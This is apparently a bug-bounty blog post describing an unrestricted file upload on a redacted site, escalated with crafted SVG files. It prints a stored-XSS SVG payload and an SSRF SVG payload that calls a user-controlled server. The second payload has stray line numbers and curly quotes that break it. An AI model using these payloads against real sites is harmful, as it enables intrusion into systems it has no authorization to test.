I was doing hunting on website it is private site let’s take as redacted.com, after some hours of hunting i got some low vulnerability bugs i one of them i got unrestricted file upload by changing the content type header and then i thought of making it more critical vulnerability….!
Description:
I have crafted a malicious SVG file, since the application has unrestricted file upload bug and do not filter the content, the code below can be saved with the .svg extension file and i have used below payload to trigger
<?xml version=”1.0" standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">
<polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009900" stroke=”#004400"/>
<script type=”text/javascript”>
alert(‘Vulnerable to XSS attacks’);
</script>
</svg>
The vulnerability can be exploited by uploading this image in image upload section by using unrestricted file upload bug i can upload svg files and any malicious files there i have used svg and used above code in the svg and then if you preview the image the you can see the xss is triggered..!!!!
And i was also able to get svg to ssrf after using below code i have got http response in the burp collaborator :)
<?xml version=”1.0" encoding=”UTF-8" standalone=”no”?> 2<!DOCTYPE testingxxe [ <!ENTITY xml “eXtensible Markup Language”> ]> 3<svg xmlns:svg=”http://www.w3.org/2000/svg" xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink" width=”200" height=”200"> 4<image height=”30" width=”30" xlink:href=”http://<usercontrolledserever>/” /> 5<text x=”0" y=”20" font-size=”20">&xml;</text> 6</svg>
Conclusion:
This is how we can perform stored xss, ssrf attacks using svg files.
Don’t forget to hit the “follow” button to see my future blogs on security.
I will see you in the next post.
Thanks for reading!!
Want to Connect?
Follow me on twitter: https://twitter.com/nave1n0x